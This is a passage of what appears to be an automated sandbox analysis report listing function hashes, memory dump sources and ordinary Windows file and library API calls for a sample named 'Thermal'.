                                                • Opcode ID: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
                                                • Instruction ID: aedd52b19fa8d92a019576a2491c72e232eb3c6bdb0e47725fee543169f72d2a
                                                • Opcode Fuzzy Hash: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
                                                • Instruction Fuzzy Hash: 55B19F34A0114ADFCF15EF99C885DEEBBB5FF48710F20801AF915A7291EB34A952CB90
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a19e1c23469083c24a2ceb1a28d1b0a3e5065c468ec333b5bd1eea6ae7445a7e
                                                • Instruction ID: e03d288d90b7f519a387dbe0a5689443e81c6aff60c7f6127db96fe806a2149b
                                                • Opcode Fuzzy Hash: a19e1c23469083c24a2ceb1a28d1b0a3e5065c468ec333b5bd1eea6ae7445a7e
                                                • Instruction Fuzzy Hash: 7261C070600206EFEF10DF54C885A7EB7E5EF84380F118129E91A8B292D778ED91CB52
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb699751b3968d74e82e32ae457cb4231f02d562db1edf85f4ccf2dc31bc1e29
                                                • Instruction ID: b456d766b7263dc2bc355ab2f3124d431e4e8372955fe99a5d7557e22007e248
                                                • Opcode Fuzzy Hash: bb699751b3968d74e82e32ae457cb4231f02d562db1edf85f4ccf2dc31bc1e29
                                                • Instruction Fuzzy Hash: 06515D35600604DBCF24FB68C999FAE77B6AF45750F148158F91AAB392CB38ED01CB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 497abb3ec12bd233acfaab1677771f994f5f36b770577b9cff50e90bcc23f6ab
                                                • Instruction ID: d17a173b5ec072b4ca1c4f49edbda41a0077fc87aa554ad5cc1466888a9670d5
                                                • Opcode Fuzzy Hash: 497abb3ec12bd233acfaab1677771f994f5f36b770577b9cff50e90bcc23f6ab
                                                • Instruction Fuzzy Hash: 3A31A075644A02DFC724EF1DD494A31F7A0FF09B10714C56DE98A8B7A1D734E991CB90
                                                APIs
                                                • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 007841B2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 13752167c977125652ba4e65d4b405237a1458521f109ed833dcbccaa9f75713
                                                • Instruction ID: 419f07d9ed73a0c3c782923c4673239523f76c11e575077712aafc2074ef6289
                                                • Opcode Fuzzy Hash: 13752167c977125652ba4e65d4b405237a1458521f109ed833dcbccaa9f75713
                                                • Instruction Fuzzy Hash: 64314D71A4071AEFCB18DF6DC888A5DB7B5FF58320F148619E81593714D7B8BDA08B90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: b4952a21e5d8c178853b77d4ccef3a0793e0ffbc52b88ee433c45d112f0a1c8e
                                                • Instruction ID: bc24208a3791647837c7237376f47020b0b91c26a2d02693d31cd53b5cc84f88
                                                • Opcode Fuzzy Hash: b4952a21e5d8c178853b77d4ccef3a0793e0ffbc52b88ee433c45d112f0a1c8e
                                                • Instruction Fuzzy Hash: F0412C74504741DFDB14DF14C498B1ABBE1BF85348F1989ACE4899B362C37AEC45CB52
                                                APIs
                                                  • Part of subcall function 00784B29: FreeLibrary.KERNEL32(00000000,?), ref: 00784B63
                                                  • Part of subcall function 0079547B: __wfsopen.LIBCMT ref: 00795486
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4
                                                  • Part of subcall function 00784ADE: FreeLibrary.KERNEL32(00000000), ref: 00784B18
                                                  • Part of subcall function 007848B0: _memmove.LIBCMT ref: 007848FA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
                                                • Instruction ID: c431e3816fc8a7a5a32a5a4c3c2e2daca860278b78aa1b2b78adc92c5b190b6c
                                                • Opcode Fuzzy Hash: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
                                                • Instruction Fuzzy Hash: B611E7316D0216EBCF18FB70CC0AFAE77A99F40701F10C42DF541BA191EABC9A11AB95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 90bc0eaf2b7dc02e78cb212d4ba3e610607b108b277c42cef43cf240b39c3ac7
                                                • Instruction ID: 83c8a5842454d9079c158bebc92286eec80f3a7684c886b9640ae6d8ede891dc
                                                • Opcode Fuzzy Hash: 90bc0eaf2b7dc02e78cb212d4ba3e610607b108b277c42cef43cf240b39c3ac7
                                                • Instruction Fuzzy Hash: 742134B4608741DFCB54DF54C458B1ABBE1BF89344F09896CF88A57322C739E849CBA2
                                                APIs
                                                • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00783CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00784276
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 661a3fb31612697bb77ffeb82715fa2e42328f67098717b3d6cfc6d492a260dc
                                                • Instruction ID: 306f246780f997522fcdaf2593ea93d06fb2b4be0f0c3443b3f9c21334cbcbb6
                                                • Opcode Fuzzy Hash: 661a3fb31612697bb77ffeb82715fa2e42328f67098717b3d6cfc6d492a260dc
                                                • Instruction Fuzzy Hash: 87113A312487029FD320DF55C880B66B7F5FF88710F10C92EE8AA86A50D7B9E845CB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 542a4bfffb2803eb9ccca5bcc7afd3f8b165b2bf1a6417e1191cdaa5bbed4f6a
                                                • Instruction ID: 31bfcb90f6b3017888e0089d8a595c2d98a76f2968dc47844990ca729cd30618
                                                • Opcode Fuzzy Hash: 542a4bfffb2803eb9ccca5bcc7afd3f8b165b2bf1a6417e1191cdaa5bbed4f6a
                                                • Instruction Fuzzy Hash: E701F972251701AED7246F38EC06F77BB9CDB447A0F50C52EF52ACA1D1EA35E5508790
                                                APIs
                                                • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007E4998
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: EnvironmentVariable
                                                • String ID:
                                                • API String ID: 1431749950-0
                                                • Opcode ID: a929ab573fe376e799b73072e80be86ca70bbf77b50d7db6a7ce73a235c4f0c6
                                                • Instruction ID: b9110513951f5863396915a9f3e6ded76a298cb5b9d457646406601f7c499a35
                                                • Opcode Fuzzy Hash: a929ab573fe376e799b73072e80be86ca70bbf77b50d7db6a7ce73a235c4f0c6
                                                • Instruction Fuzzy Hash: C4F04435608109EFCB14FB65D84AC9F77BCEF49720B404056F9089B251DE75BD41C750
                                                APIs
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                • _memset.LIBCMT ref: 007D7CB4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw_memsetstd::exception::exception
                                                • String ID:
                                                • API String ID: 525207782-0
                                                • Opcode ID: dfea13ef8d664f2402f1372fa9a45a609c6fe10dff130b19145f17d106351125
                                                • Instruction ID: 88e666308c8ea965db234ff05886d95c65e54c82f64907b92f26b505edf13820
                                                • Opcode Fuzzy Hash: dfea13ef8d664f2402f1372fa9a45a609c6fe10dff130b19145f17d106351125
                                                • Instruction Fuzzy Hash: 2201F674208200DFD725EF5CE545F45BBE6AF59710F24C45AF5888B392DB76E800CB91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _fseek
                                                • String ID:
                                                • API String ID: 2937370855-0
                                                • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                • Instruction ID: 53a643b67b6a590ecc0a0a10ea7cf60179caf1a4fad84d7462fc235bea07fc7e
                                                • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                • Instruction Fuzzy Hash: 61F085B6400208FFDF159F95EC04DEBBF79EB89320F00819CF9045A210D272EA218BA0
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,?,007827AF,?,00000001), ref: 00784A63
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 9da1f86b95fba57858813ee34ca7ca1ab98f801e686397e1847f6b6b50a81778
                                                • Instruction ID: 72dcaddeec96ed52593c60914bb06b1992bd187a6102c604d6c862cf24443b90
                                                • Opcode Fuzzy Hash: 9da1f86b95fba57858813ee34ca7ca1ab98f801e686397e1847f6b6b50a81778
                                                • Instruction Fuzzy Hash: 64F01571185712CFCB38AF64E494816BBF1BF14325320C92EE1D68B611C7BA9984DF55
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                • Instruction ID: 034805f09dd58d5e6fe514380c1de94324c0ac9d322466ca32ce1b7961f88d02
                                                • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                • Instruction Fuzzy Hash: 30F0F87240020DFFDF05DF90C945EAABB79FB14314F208589F9198A212D376EA21AB91
                                                APIs
                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: 8afec97575457e87125ffd6ff51f96e16aa5431f3bbdc2ba94b3be1f11c7079c
                                                • Instruction ID: 3b29071c607f504e873fb6f78c6b774d13b97c6cd518449383be0c64fd67f677
                                                • Opcode Fuzzy Hash: 8afec97575457e87125ffd6ff51f96e16aa5431f3bbdc2ba94b3be1f11c7079c
                                                • Instruction Fuzzy Hash: 94E0863690012857C721A6989C0AFEA77DDEB896A0F0502B6FC08D7344D9649C818A91
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 007D4D31
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FolderPath_memmove
                                                • String ID:
                                                • API String ID: 3334745507-0
                                                • Opcode ID: 3e94f03008c0abcc1930c789c5b86bc54f27df8321be600098c278804680edd3
                                                • Instruction ID: 00b2795b59bb8f3701d9d167a726c5e940f57ae2d9a49a39c8652882d5a7cc0e
                                                • Opcode Fuzzy Hash: 3e94f03008c0abcc1930c789c5b86bc54f27df8321be600098c278804680edd3
                                                • Instruction Fuzzy Hash: 2CD05EA190032C6BDB60E6A49C0EDB77BACE744224F0006E17C5CC3101E9249D458AE0
                                                APIs
                                                  • Part of subcall function 007D384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,007D3959,00000000,00000000,?,007C05DB,00828070,00000002,?,?), ref: 007D38CA
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,007C05DB,00828070,00000002,?,?,?,00000000), ref: 007D3967
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID:
                                                • API String ID: 539440098-0
                                                • Opcode ID: 652501c8d29b213cb94895d0efbd1af4a0842cfcb3649bfaa3cc9dda15f1c622
                                                • Instruction ID: 92949bcffc089d84eeb5bf851c37cb6a327b9aa07e4a3fd89ed48f81b22675e1
                                                • Opcode Fuzzy Hash: 652501c8d29b213cb94895d0efbd1af4a0842cfcb3649bfaa3cc9dda15f1c622
                                                • Instruction Fuzzy Hash: DFE04636400208FFDB20AF94D805B9ABBBDEB04320F00465BFD4092111DBB2AE24ABE1
                                                APIs
                                                • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,007D3E7D,?,?,?), ref: 007D3F0D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CopyFile
                                                • String ID:
                                                • API String ID: 1304948518-0
                                                • Opcode ID: 2a5c406756c668e01b2126d999fdd2aebe01ab0387b0a623393e301f7cff417e
                                                • Instruction ID: 568f6126d1cc8318a158415f930a9bde4d3404e58200c66b8d09e2b495d1fc8f
                                                • Opcode Fuzzy Hash: 2a5c406756c668e01b2126d999fdd2aebe01ab0387b0a623393e301f7cff417e
                                                • Instruction Fuzzy Hash: 2ED0A7315E020CBFEF50DFA0CC06FA8B7ACE711706F1002A4B504D90E0DA7269149B95
                                                APIs
                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,007C06E6,00000000,00000000,00000000), ref: 007842BF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 85d6290fb995e6884ffe0058553327a9fd2d8a79f7aca8290195cb6288abfdf7
                                                • Instruction ID: 4d7a5525bdef1235fdf8ad202aaaecb654a0620b1caceae15e208f3a615c6f7c
                                                • Opcode Fuzzy Hash: 85d6290fb995e6884ffe0058553327a9fd2d8a79f7aca8290195cb6288abfdf7
                                                • Instruction Fuzzy Hash: 68D0C77464020CBFE710CB80DC46FA9777CE705710F100195FD0466290D6B27D508B95
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
